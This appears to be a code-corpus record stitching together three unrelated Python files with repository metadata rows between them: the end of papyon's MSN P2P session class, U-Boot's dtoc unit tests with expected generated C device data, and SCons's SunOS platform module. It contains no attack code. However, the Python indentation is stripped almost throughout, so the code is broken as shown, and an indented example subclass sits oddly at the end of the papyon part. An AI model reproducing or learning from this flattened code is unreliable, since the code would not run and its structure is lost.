print "Unhandled signaling blob :", message
elif isinstance(message, SLPResponseMessage):
if isinstance(message.body, SLPSessionRequestBody):
self.stop_timeout("response")
if message.status == 200:
self._emit("accepted")
self._on_session_accepted()
elif message.status == 603:
self._emit("rejected")
self._on_session_rejected(message)
else:
print "Unhandled response blob :", message
def _on_data_sent(self, data):
logger.info("Session data transfer completed")
data.seek(0, os.SEEK_SET)
self._completed = True
self._emit("completed", data)
self.start_timeout("bye", 5)
def _on_data_received(self, data):
logger.info("Session data transfer completed")
data.seek(0, os.SEEK_SET)
self._completed = True
self._emit("completed", data)
self._close()
def _on_data_transferred(self, size):
self._emit("progressed", size)
def on_response_timeout(self):
self._close()
def on_bye_timeout(self):
self._dispose()
# Methods to implement in different P2P applications
def _on_invite_received(self, message):
pass
def _on_bye_received(self, message):
self._dispose()
def _on_session_accepted(self):
pass
def _on_session_rejected(self, message):
self._dispose()
    # Utility methods
def _emit(self, signal, *args):
self._dispatch("on_session_%s" % signal, *args)
self.emit(signal, *args)
gobject.type_register(P2PSession)
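# A minimal sketch of the extension point noted above ("Methods to implement
# in different P2P applications"): a concrete application subclasses
# P2PSession and overrides the _on_* hooks. The behaviour here is a
# placeholder only.
class _ExampleAutoAcceptSession(P2PSession):
    def _on_invite_received(self, message):
        # a real application would inspect message.body before deciding
        self._accept()
    def _on_session_rejected(self, message):
        self._dispose()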
|
billiob/papyon
|
papyon/msnp2p/session.py
|
Python
|
gpl-2.0
| 11,748
|
#!/usr/bin/env python3
# SPDX-License-Identifier: GPL-2.0+
# Copyright (c) 2012 The Chromium OS Authors.
#
"""Tests for the dtb_platdata module
This includes unit tests for some functions and functional tests for the dtoc
tool.
"""
import collections
import os
import struct
import sys
import tempfile
import unittest
from dtoc import dtb_platdata
from dtb_platdata import conv_name_to_c
from dtb_platdata import get_compat_name
from dtb_platdata import get_value
from dtb_platdata import tab_to
from dtoc import fdt
from dtoc import fdt_util
from patman import test_util
from patman import tools
our_path = os.path.dirname(os.path.realpath(__file__))
HEADER = '''/*
* DO NOT MODIFY
*
* This file was generated by dtoc from a .dtb (device tree binary) file.
*/
#include <stdbool.h>
#include <linux/libfdt.h>'''
C_HEADER = '''/*
* DO NOT MODIFY
*
* This file was generated by dtoc from a .dtb (device tree binary) file.
*/
/* Allow use of U_BOOT_DEVICE() in this file */
#define DT_PLATDATA_C
#include <common.h>
#include <dm.h>
#include <dt-structs.h>
'''
C_EMPTY_POPULATE_PHANDLE_DATA = '''void dm_populate_phandle_data(void) {
}
'''
def get_dtb_file(dts_fname, capture_stderr=False):
"""Compile a .dts file to a .dtb
Args:
dts_fname: Filename of .dts file in the current directory
capture_stderr: True to capture and discard stderr output
Returns:
Filename of compiled file in output directory
"""
return fdt_util.EnsureCompiled(os.path.join(our_path, dts_fname),
capture_stderr=capture_stderr)
class TestDtoc(unittest.TestCase):
"""Tests for dtoc"""
@classmethod
def setUpClass(cls):
tools.PrepareOutputDir(None)
cls.maxDiff = None
@classmethod
def tearDownClass(cls):
tools._RemoveOutputDir()
def _WritePythonString(self, fname, data):
"""Write a string with tabs expanded as done in this Python file
Args:
fname: Filename to write to
data: Raw string to convert
"""
data = data.replace('\t', '\\t')
with open(fname, 'w') as fd:
fd.write(data)
def _CheckStrings(self, expected, actual):
"""Check that a string matches its expected value
If the strings do not match, they are written to the /tmp directory in
the same Python format as is used here in the test. This allows for
easy comparison and update of the tests.
Args:
expected: Expected string
actual: Actual string
"""
if expected != actual:
self._WritePythonString('/tmp/binman.expected', expected)
self._WritePythonString('/tmp/binman.actual', actual)
print('Failures written to /tmp/binman.{expected,actual}')
self.assertEquals(expected, actual)
def run_test(self, args, dtb_file, output):
dtb_platdata.run_steps(args, dtb_file, False, output, True)
def test_name(self):
"""Test conversion of device tree names to C identifiers"""
self.assertEqual('serial_at_0x12', conv_name_to_c('serial@0x12'))
self.assertEqual('vendor_clock_frequency',
conv_name_to_c('vendor,clock-frequency'))
self.assertEqual('rockchip_rk3399_sdhci_5_1',
conv_name_to_c('rockchip,rk3399-sdhci-5.1'))
def test_tab_to(self):
"""Test operation of tab_to() function"""
self.assertEqual('fred ', tab_to(0, 'fred'))
self.assertEqual('fred\t', tab_to(1, 'fred'))
self.assertEqual('fred was here ', tab_to(1, 'fred was here'))
self.assertEqual('fred was here\t\t', tab_to(3, 'fred was here'))
self.assertEqual('exactly8 ', tab_to(1, 'exactly8'))
self.assertEqual('exactly8\t', tab_to(2, 'exactly8'))
def test_get_value(self):
"""Test operation of get_value() function"""
self.assertEqual('0x45',
get_value(fdt.TYPE_INT, struct.pack('>I', 0x45)))
self.assertEqual('0x45',
get_value(fdt.TYPE_BYTE, struct.pack('<I', 0x45)))
self.assertEqual('0x0',
get_value(fdt.TYPE_BYTE, struct.pack('>I', 0x45)))
self.assertEqual('"test"', get_value(fdt.TYPE_STRING, 'test'))
self.assertEqual('true', get_value(fdt.TYPE_BOOL, None))
def test_get_compat_name(self):
"""Test operation of get_compat_name() function"""
Prop = collections.namedtuple('Prop', ['value'])
Node = collections.namedtuple('Node', ['props'])
prop = Prop(['rockchip,rk3399-sdhci-5.1', 'arasan,sdhci-5.1'])
node = Node({'compatible': prop})
self.assertEqual((['rockchip_rk3399_sdhci_5_1', 'arasan_sdhci_5_1']),
get_compat_name(node))
prop = Prop(['rockchip,rk3399-sdhci-5.1'])
node = Node({'compatible': prop})
self.assertEqual((['rockchip_rk3399_sdhci_5_1']),
get_compat_name(node))
prop = Prop(['rockchip,rk3399-sdhci-5.1', 'arasan,sdhci-5.1', 'third'])
node = Node({'compatible': prop})
self.assertEqual((['rockchip_rk3399_sdhci_5_1',
'arasan_sdhci_5_1', 'third']),
get_compat_name(node))
def test_empty_file(self):
"""Test output from a device tree file with no nodes"""
dtb_file = get_dtb_file('dtoc_test_empty.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
lines = infile.read().splitlines()
self.assertEqual(HEADER.splitlines(), lines)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
lines = infile.read().splitlines()
self.assertEqual(C_HEADER.splitlines() + [''] +
C_EMPTY_POPULATE_PHANDLE_DATA.splitlines(), lines)
def test_simple(self):
"""Test output from some simple nodes with various types of data"""
dtb_file = get_dtb_file('dtoc_test_simple.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_sandbox_i2c_test {
};
struct dtd_sandbox_pmic_test {
\tbool\t\tlow_power;
\tfdt64_t\t\treg[2];
};
struct dtd_sandbox_spl_test {
\tconst char * acpi_name;
\tbool\t\tboolval;
\tunsigned char\tbytearray[3];
\tunsigned char\tbyteval;
\tfdt32_t\t\tintarray[4];
\tfdt32_t\t\tintval;
\tunsigned char\tlongbytearray[9];
\tunsigned char\tnotstring[5];
\tconst char *\tstringarray[3];
\tconst char *\tstringval;
};
struct dtd_sandbox_spl_test_2 {
};
''', data)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /i2c@0 index 0 */
static struct dtd_sandbox_i2c_test dtv_i2c_at_0 = {
};
U_BOOT_DEVICE(i2c_at_0) = {
\t.name\t\t= "sandbox_i2c_test",
\t.platdata\t= &dtv_i2c_at_0,
\t.platdata_size\t= sizeof(dtv_i2c_at_0),
\t.parent_idx\t= -1,
};
/* Node /i2c@0/pmic@9 index 1 */
static struct dtd_sandbox_pmic_test dtv_pmic_at_9 = {
\t.low_power\t\t= true,
\t.reg\t\t\t= {0x9, 0x0},
};
U_BOOT_DEVICE(pmic_at_9) = {
\t.name\t\t= "sandbox_pmic_test",
\t.platdata\t= &dtv_pmic_at_9,
\t.platdata_size\t= sizeof(dtv_pmic_at_9),
\t.parent_idx\t= 0,
};
/* Node /spl-test index 2 */
static struct dtd_sandbox_spl_test dtv_spl_test = {
\t.boolval\t\t= true,
\t.bytearray\t\t= {0x6, 0x0, 0x0},
\t.byteval\t\t= 0x5,
\t.intarray\t\t= {0x2, 0x3, 0x4, 0x0},
\t.intval\t\t\t= 0x1,
\t.longbytearray\t\t= {0x9, 0xa, 0xb, 0xc, 0xd, 0xe, 0xf, 0x10,
\t\t0x11},
\t.notstring\t\t= {0x20, 0x21, 0x22, 0x10, 0x0},
\t.stringarray\t\t= {"multi-word", "message", ""},
\t.stringval\t\t= "message",
};
U_BOOT_DEVICE(spl_test) = {
\t.name\t\t= "sandbox_spl_test",
\t.platdata\t= &dtv_spl_test,
\t.platdata_size\t= sizeof(dtv_spl_test),
\t.parent_idx\t= -1,
};
/* Node /spl-test2 index 3 */
static struct dtd_sandbox_spl_test dtv_spl_test2 = {
\t.acpi_name\t\t= "\\\\_SB.GPO0",
\t.bytearray\t\t= {0x1, 0x23, 0x34},
\t.byteval\t\t= 0x8,
\t.intarray\t\t= {0x5, 0x0, 0x0, 0x0},
\t.intval\t\t\t= 0x3,
\t.longbytearray\t\t= {0x9, 0xa, 0xb, 0xc, 0x0, 0x0, 0x0, 0x0,
\t\t0x0},
\t.stringarray\t\t= {"another", "multi-word", "message"},
\t.stringval\t\t= "message2",
};
U_BOOT_DEVICE(spl_test2) = {
\t.name\t\t= "sandbox_spl_test",
\t.platdata\t= &dtv_spl_test2,
\t.platdata_size\t= sizeof(dtv_spl_test2),
\t.parent_idx\t= -1,
};
/* Node /spl-test3 index 4 */
static struct dtd_sandbox_spl_test dtv_spl_test3 = {
\t.longbytearray\t\t= {0x9, 0xa, 0xb, 0xc, 0xd, 0xe, 0xf, 0x10,
\t\t0x0},
\t.stringarray\t\t= {"one", "", ""},
};
U_BOOT_DEVICE(spl_test3) = {
\t.name\t\t= "sandbox_spl_test",
\t.platdata\t= &dtv_spl_test3,
\t.platdata_size\t= sizeof(dtv_spl_test3),
\t.parent_idx\t= -1,
};
/* Node /spl-test4 index 5 */
static struct dtd_sandbox_spl_test_2 dtv_spl_test4 = {
};
U_BOOT_DEVICE(spl_test4) = {
\t.name\t\t= "sandbox_spl_test_2",
\t.platdata\t= &dtv_spl_test4,
\t.platdata_size\t= sizeof(dtv_spl_test4),
\t.parent_idx\t= -1,
};
''' + C_EMPTY_POPULATE_PHANDLE_DATA, data)
def test_driver_alias(self):
"""Test output from a device tree file with a driver alias"""
dtb_file = get_dtb_file('dtoc_test_driver_alias.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_sandbox_gpio {
\tconst char *\tgpio_bank_name;
\tbool\t\tgpio_controller;
\tfdt32_t\t\tsandbox_gpio_count;
};
''', data)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /gpios@0 index 0 */
static struct dtd_sandbox_gpio dtv_gpios_at_0 = {
\t.gpio_bank_name\t\t= "a",
\t.gpio_controller\t= true,
\t.sandbox_gpio_count\t= 0x14,
};
U_BOOT_DEVICE(gpios_at_0) = {
\t.name\t\t= "sandbox_gpio",
\t.platdata\t= &dtv_gpios_at_0,
\t.platdata_size\t= sizeof(dtv_gpios_at_0),
\t.parent_idx\t= -1,
};
void dm_populate_phandle_data(void) {
}
''', data)
def test_invalid_driver(self):
"""Test output from a device tree file with an invalid driver"""
dtb_file = get_dtb_file('dtoc_test_invalid_driver.dts')
output = tools.GetOutputFilename('output')
with test_util.capture_sys_output() as (stdout, stderr):
dtb_platdata.run_steps(['struct'], dtb_file, False, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_invalid {
};
''', data)
with test_util.capture_sys_output() as (stdout, stderr):
dtb_platdata.run_steps(['platdata'], dtb_file, False, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /spl-test index 0 */
static struct dtd_invalid dtv_spl_test = {
};
U_BOOT_DEVICE(spl_test) = {
\t.name\t\t= "invalid",
\t.platdata\t= &dtv_spl_test,
\t.platdata_size\t= sizeof(dtv_spl_test),
\t.parent_idx\t= -1,
};
void dm_populate_phandle_data(void) {
}
''', data)
def test_phandle(self):
"""Test output from a node containing a phandle reference"""
dtb_file = get_dtb_file('dtoc_test_phandle.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_source {
\tstruct phandle_2_arg clocks[4];
};
struct dtd_target {
\tfdt32_t\t\tintval;
};
''', data)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /phandle2-target index 0 */
static struct dtd_target dtv_phandle2_target = {
\t.intval\t\t\t= 0x1,
};
U_BOOT_DEVICE(phandle2_target) = {
\t.name\t\t= "target",
\t.platdata\t= &dtv_phandle2_target,
\t.platdata_size\t= sizeof(dtv_phandle2_target),
\t.parent_idx\t= -1,
};
/* Node /phandle3-target index 1 */
static struct dtd_target dtv_phandle3_target = {
\t.intval\t\t\t= 0x2,
};
U_BOOT_DEVICE(phandle3_target) = {
\t.name\t\t= "target",
\t.platdata\t= &dtv_phandle3_target,
\t.platdata_size\t= sizeof(dtv_phandle3_target),
\t.parent_idx\t= -1,
};
/* Node /phandle-target index 4 */
static struct dtd_target dtv_phandle_target = {
\t.intval\t\t\t= 0x0,
};
U_BOOT_DEVICE(phandle_target) = {
\t.name\t\t= "target",
\t.platdata\t= &dtv_phandle_target,
\t.platdata_size\t= sizeof(dtv_phandle_target),
\t.parent_idx\t= -1,
};
/* Node /phandle-source index 2 */
static struct dtd_source dtv_phandle_source = {
\t.clocks\t\t\t= {
\t\t\t{4, {}},
\t\t\t{0, {11}},
\t\t\t{1, {12, 13}},
\t\t\t{4, {}},},
};
U_BOOT_DEVICE(phandle_source) = {
\t.name\t\t= "source",
\t.platdata\t= &dtv_phandle_source,
\t.platdata_size\t= sizeof(dtv_phandle_source),
\t.parent_idx\t= -1,
};
/* Node /phandle-source2 index 3 */
static struct dtd_source dtv_phandle_source2 = {
\t.clocks\t\t\t= {
\t\t\t{4, {}},},
};
U_BOOT_DEVICE(phandle_source2) = {
\t.name\t\t= "source",
\t.platdata\t= &dtv_phandle_source2,
\t.platdata_size\t= sizeof(dtv_phandle_source2),
\t.parent_idx\t= -1,
};
void dm_populate_phandle_data(void) {
}
''', data)
def test_phandle_single(self):
"""Test output from a node containing a phandle reference"""
dtb_file = get_dtb_file('dtoc_test_phandle_single.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_source {
\tstruct phandle_0_arg clocks[1];
};
struct dtd_target {
\tfdt32_t\t\tintval;
};
''', data)
def test_phandle_reorder(self):
"""Test that phandle targets are generated before their references"""
dtb_file = get_dtb_file('dtoc_test_phandle_reorder.dts')
output = tools.GetOutputFilename('output')
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /phandle-target index 1 */
static struct dtd_target dtv_phandle_target = {
};
U_BOOT_DEVICE(phandle_target) = {
\t.name\t\t= "target",
\t.platdata\t= &dtv_phandle_target,
\t.platdata_size\t= sizeof(dtv_phandle_target),
\t.parent_idx\t= -1,
};
/* Node /phandle-source2 index 0 */
static struct dtd_source dtv_phandle_source2 = {
\t.clocks\t\t\t= {
\t\t\t{1, {}},},
};
U_BOOT_DEVICE(phandle_source2) = {
\t.name\t\t= "source",
\t.platdata\t= &dtv_phandle_source2,
\t.platdata_size\t= sizeof(dtv_phandle_source2),
\t.parent_idx\t= -1,
};
void dm_populate_phandle_data(void) {
}
''', data)
def test_phandle_cd_gpio(self):
"""Test that phandle targets are generated when unsing cd-gpios"""
dtb_file = get_dtb_file('dtoc_test_phandle_cd_gpios.dts')
output = tools.GetOutputFilename('output')
dtb_platdata.run_steps(['platdata'], dtb_file, False, output, True)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /phandle2-target index 0 */
static struct dtd_target dtv_phandle2_target = {
\t.intval\t\t\t= 0x1,
};
U_BOOT_DEVICE(phandle2_target) = {
\t.name\t\t= "target",
\t.platdata\t= &dtv_phandle2_target,
\t.platdata_size\t= sizeof(dtv_phandle2_target),
\t.parent_idx\t= -1,
};
/* Node /phandle3-target index 1 */
static struct dtd_target dtv_phandle3_target = {
\t.intval\t\t\t= 0x2,
};
U_BOOT_DEVICE(phandle3_target) = {
\t.name\t\t= "target",
\t.platdata\t= &dtv_phandle3_target,
\t.platdata_size\t= sizeof(dtv_phandle3_target),
\t.parent_idx\t= -1,
};
/* Node /phandle-target index 4 */
static struct dtd_target dtv_phandle_target = {
\t.intval\t\t\t= 0x0,
};
U_BOOT_DEVICE(phandle_target) = {
\t.name\t\t= "target",
\t.platdata\t= &dtv_phandle_target,
\t.platdata_size\t= sizeof(dtv_phandle_target),
\t.parent_idx\t= -1,
};
/* Node /phandle-source index 2 */
static struct dtd_source dtv_phandle_source = {
\t.cd_gpios\t\t= {
\t\t\t{4, {}},
\t\t\t{0, {11}},
\t\t\t{1, {12, 13}},
\t\t\t{4, {}},},
};
U_BOOT_DEVICE(phandle_source) = {
\t.name\t\t= "source",
\t.platdata\t= &dtv_phandle_source,
\t.platdata_size\t= sizeof(dtv_phandle_source),
\t.parent_idx\t= -1,
};
/* Node /phandle-source2 index 3 */
static struct dtd_source dtv_phandle_source2 = {
\t.cd_gpios\t\t= {
\t\t\t{4, {}},},
};
U_BOOT_DEVICE(phandle_source2) = {
\t.name\t\t= "source",
\t.platdata\t= &dtv_phandle_source2,
\t.platdata_size\t= sizeof(dtv_phandle_source2),
\t.parent_idx\t= -1,
};
void dm_populate_phandle_data(void) {
}
''', data)
def test_phandle_bad(self):
"""Test a node containing an invalid phandle fails"""
dtb_file = get_dtb_file('dtoc_test_phandle_bad.dts',
capture_stderr=True)
output = tools.GetOutputFilename('output')
with self.assertRaises(ValueError) as e:
self.run_test(['struct'], dtb_file, output)
self.assertIn("Cannot parse 'clocks' in node 'phandle-source'",
str(e.exception))
def test_phandle_bad2(self):
"""Test a phandle target missing its #*-cells property"""
dtb_file = get_dtb_file('dtoc_test_phandle_bad2.dts',
capture_stderr=True)
output = tools.GetOutputFilename('output')
with self.assertRaises(ValueError) as e:
self.run_test(['struct'], dtb_file, output)
self.assertIn("Node 'phandle-target' has no cells property",
str(e.exception))
def test_addresses64(self):
"""Test output from a node with a 'reg' property with na=2, ns=2"""
dtb_file = get_dtb_file('dtoc_test_addr64.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_test1 {
\tfdt64_t\t\treg[2];
};
struct dtd_test2 {
\tfdt64_t\t\treg[2];
};
struct dtd_test3 {
\tfdt64_t\t\treg[4];
};
''', data)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /test1 index 0 */
static struct dtd_test1 dtv_test1 = {
\t.reg\t\t\t= {0x1234, 0x5678},
};
U_BOOT_DEVICE(test1) = {
\t.name\t\t= "test1",
\t.platdata\t= &dtv_test1,
\t.platdata_size\t= sizeof(dtv_test1),
\t.parent_idx\t= -1,
};
/* Node /test2 index 1 */
static struct dtd_test2 dtv_test2 = {
\t.reg\t\t\t= {0x1234567890123456, 0x9876543210987654},
};
U_BOOT_DEVICE(test2) = {
\t.name\t\t= "test2",
\t.platdata\t= &dtv_test2,
\t.platdata_size\t= sizeof(dtv_test2),
\t.parent_idx\t= -1,
};
/* Node /test3 index 2 */
static struct dtd_test3 dtv_test3 = {
\t.reg\t\t\t= {0x1234567890123456, 0x9876543210987654, 0x2, 0x3},
};
U_BOOT_DEVICE(test3) = {
\t.name\t\t= "test3",
\t.platdata\t= &dtv_test3,
\t.platdata_size\t= sizeof(dtv_test3),
\t.parent_idx\t= -1,
};
''' + C_EMPTY_POPULATE_PHANDLE_DATA, data)
def test_addresses32(self):
"""Test output from a node with a 'reg' property with na=1, ns=1"""
dtb_file = get_dtb_file('dtoc_test_addr32.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_test1 {
\tfdt32_t\t\treg[2];
};
struct dtd_test2 {
\tfdt32_t\t\treg[4];
};
''', data)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /test1 index 0 */
static struct dtd_test1 dtv_test1 = {
\t.reg\t\t\t= {0x1234, 0x5678},
};
U_BOOT_DEVICE(test1) = {
\t.name\t\t= "test1",
\t.platdata\t= &dtv_test1,
\t.platdata_size\t= sizeof(dtv_test1),
\t.parent_idx\t= -1,
};
/* Node /test2 index 1 */
static struct dtd_test2 dtv_test2 = {
\t.reg\t\t\t= {0x12345678, 0x98765432, 0x2, 0x3},
};
U_BOOT_DEVICE(test2) = {
\t.name\t\t= "test2",
\t.platdata\t= &dtv_test2,
\t.platdata_size\t= sizeof(dtv_test2),
\t.parent_idx\t= -1,
};
''' + C_EMPTY_POPULATE_PHANDLE_DATA, data)
def test_addresses64_32(self):
"""Test output from a node with a 'reg' property with na=2, ns=1"""
dtb_file = get_dtb_file('dtoc_test_addr64_32.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_test1 {
\tfdt64_t\t\treg[2];
};
struct dtd_test2 {
\tfdt64_t\t\treg[2];
};
struct dtd_test3 {
\tfdt64_t\t\treg[4];
};
''', data)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /test1 index 0 */
static struct dtd_test1 dtv_test1 = {
\t.reg\t\t\t= {0x123400000000, 0x5678},
};
U_BOOT_DEVICE(test1) = {
\t.name\t\t= "test1",
\t.platdata\t= &dtv_test1,
\t.platdata_size\t= sizeof(dtv_test1),
\t.parent_idx\t= -1,
};
/* Node /test2 index 1 */
static struct dtd_test2 dtv_test2 = {
\t.reg\t\t\t= {0x1234567890123456, 0x98765432},
};
U_BOOT_DEVICE(test2) = {
\t.name\t\t= "test2",
\t.platdata\t= &dtv_test2,
\t.platdata_size\t= sizeof(dtv_test2),
\t.parent_idx\t= -1,
};
/* Node /test3 index 2 */
static struct dtd_test3 dtv_test3 = {
\t.reg\t\t\t= {0x1234567890123456, 0x98765432, 0x2, 0x3},
};
U_BOOT_DEVICE(test3) = {
\t.name\t\t= "test3",
\t.platdata\t= &dtv_test3,
\t.platdata_size\t= sizeof(dtv_test3),
\t.parent_idx\t= -1,
};
''' + C_EMPTY_POPULATE_PHANDLE_DATA, data)
def test_addresses32_64(self):
"""Test output from a node with a 'reg' property with na=1, ns=2"""
dtb_file = get_dtb_file('dtoc_test_addr32_64.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_test1 {
\tfdt64_t\t\treg[2];
};
struct dtd_test2 {
\tfdt64_t\t\treg[2];
};
struct dtd_test3 {
\tfdt64_t\t\treg[4];
};
''', data)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /test1 index 0 */
static struct dtd_test1 dtv_test1 = {
\t.reg\t\t\t= {0x1234, 0x567800000000},
};
U_BOOT_DEVICE(test1) = {
\t.name\t\t= "test1",
\t.platdata\t= &dtv_test1,
\t.platdata_size\t= sizeof(dtv_test1),
\t.parent_idx\t= -1,
};
/* Node /test2 index 1 */
static struct dtd_test2 dtv_test2 = {
\t.reg\t\t\t= {0x12345678, 0x9876543210987654},
};
U_BOOT_DEVICE(test2) = {
\t.name\t\t= "test2",
\t.platdata\t= &dtv_test2,
\t.platdata_size\t= sizeof(dtv_test2),
\t.parent_idx\t= -1,
};
/* Node /test3 index 2 */
static struct dtd_test3 dtv_test3 = {
\t.reg\t\t\t= {0x12345678, 0x9876543210987654, 0x2, 0x3},
};
U_BOOT_DEVICE(test3) = {
\t.name\t\t= "test3",
\t.platdata\t= &dtv_test3,
\t.platdata_size\t= sizeof(dtv_test3),
\t.parent_idx\t= -1,
};
''' + C_EMPTY_POPULATE_PHANDLE_DATA, data)
def test_bad_reg(self):
"""Test that a reg property with an invalid type generates an error"""
# Capture stderr since dtc will emit warnings for this file
dtb_file = get_dtb_file('dtoc_test_bad_reg.dts', capture_stderr=True)
output = tools.GetOutputFilename('output')
with self.assertRaises(ValueError) as e:
self.run_test(['struct'], dtb_file, output)
self.assertIn("Node 'spl-test' reg property is not an int",
str(e.exception))
def test_bad_reg2(self):
"""Test that a reg property with an invalid cell count is detected"""
# Capture stderr since dtc will emit warnings for this file
dtb_file = get_dtb_file('dtoc_test_bad_reg2.dts', capture_stderr=True)
output = tools.GetOutputFilename('output')
with self.assertRaises(ValueError) as e:
self.run_test(['struct'], dtb_file, output)
self.assertIn("Node 'spl-test' reg property has 3 cells which is not a multiple of na + ns = 1 + 1)",
str(e.exception))
def test_add_prop(self):
"""Test that a subequent node can add a new property to a struct"""
dtb_file = get_dtb_file('dtoc_test_add_prop.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_sandbox_spl_test {
\tfdt32_t\t\tintarray;
\tfdt32_t\t\tintval;
};
''', data)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /spl-test index 0 */
static struct dtd_sandbox_spl_test dtv_spl_test = {
\t.intval\t\t\t= 0x1,
};
U_BOOT_DEVICE(spl_test) = {
\t.name\t\t= "sandbox_spl_test",
\t.platdata\t= &dtv_spl_test,
\t.platdata_size\t= sizeof(dtv_spl_test),
\t.parent_idx\t= -1,
};
/* Node /spl-test2 index 1 */
static struct dtd_sandbox_spl_test dtv_spl_test2 = {
\t.intarray\t\t= 0x5,
};
U_BOOT_DEVICE(spl_test2) = {
\t.name\t\t= "sandbox_spl_test",
\t.platdata\t= &dtv_spl_test2,
\t.platdata_size\t= sizeof(dtv_spl_test2),
\t.parent_idx\t= -1,
};
''' + C_EMPTY_POPULATE_PHANDLE_DATA, data)
def testStdout(self):
"""Test output to stdout"""
dtb_file = get_dtb_file('dtoc_test_simple.dts')
with test_util.capture_sys_output() as (stdout, stderr):
self.run_test(['struct'], dtb_file, '-')
def testNoCommand(self):
"""Test running dtoc without a command"""
with self.assertRaises(ValueError) as e:
self.run_test([], '', '')
self.assertIn("Please specify a command: struct, platdata",
str(e.exception))
def testBadCommand(self):
"""Test running dtoc with an invalid command"""
dtb_file = get_dtb_file('dtoc_test_simple.dts')
output = tools.GetOutputFilename('output')
with self.assertRaises(ValueError) as e:
self.run_test(['invalid-cmd'], dtb_file, output)
self.assertIn("Unknown command 'invalid-cmd': (use: struct, platdata)",
str(e.exception))
def testScanDrivers(self):
"""Test running dtoc with additional drivers to scan"""
dtb_file = get_dtb_file('dtoc_test_simple.dts')
output = tools.GetOutputFilename('output')
with test_util.capture_sys_output() as (stdout, stderr):
dtb_platdata.run_steps(['struct'], dtb_file, False, output, True,
[None, '', 'tools/dtoc/dtoc_test_scan_drivers.cxx'])
def testUnicodeError(self):
"""Test running dtoc with an invalid unicode file
To be able to perform this test without adding a weird text file which
would produce issues when using checkpatch.pl or patman, generate the
file at runtime and then process it.
"""
dtb_file = get_dtb_file('dtoc_test_simple.dts')
output = tools.GetOutputFilename('output')
driver_fn = '/tmp/' + next(tempfile._get_candidate_names())
with open(driver_fn, 'wb+') as df:
df.write(b'\x81')
with test_util.capture_sys_output() as (stdout, stderr):
dtb_platdata.run_steps(['struct'], dtb_file, False, output, True,
[driver_fn])
|
Digilent/u-boot-digilent
|
tools/dtoc/test_dtoc.py
|
Python
|
gpl-2.0
| 28,025
|
"""engine.SCons.Platform.sunos
Platform-specific initialization for Sun systems.
There normally shouldn't be any need to import this module directly. It
will usually be imported through the generic SCons.Platform.Platform()
selection method.
"""
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Platform/sunos.py rel_2.5.0:3543:937e55cd78f7 2016/04/09 11:29:54 bdbaddog"
import posix
def generate(env):
posix.generate(env)
# Based on sunSparc 8:32bit
# ARG_MAX=1048320 - 3000 for environment expansion
env['MAXLINELENGTH'] = 1045320
env['PKGINFO'] = 'pkginfo'
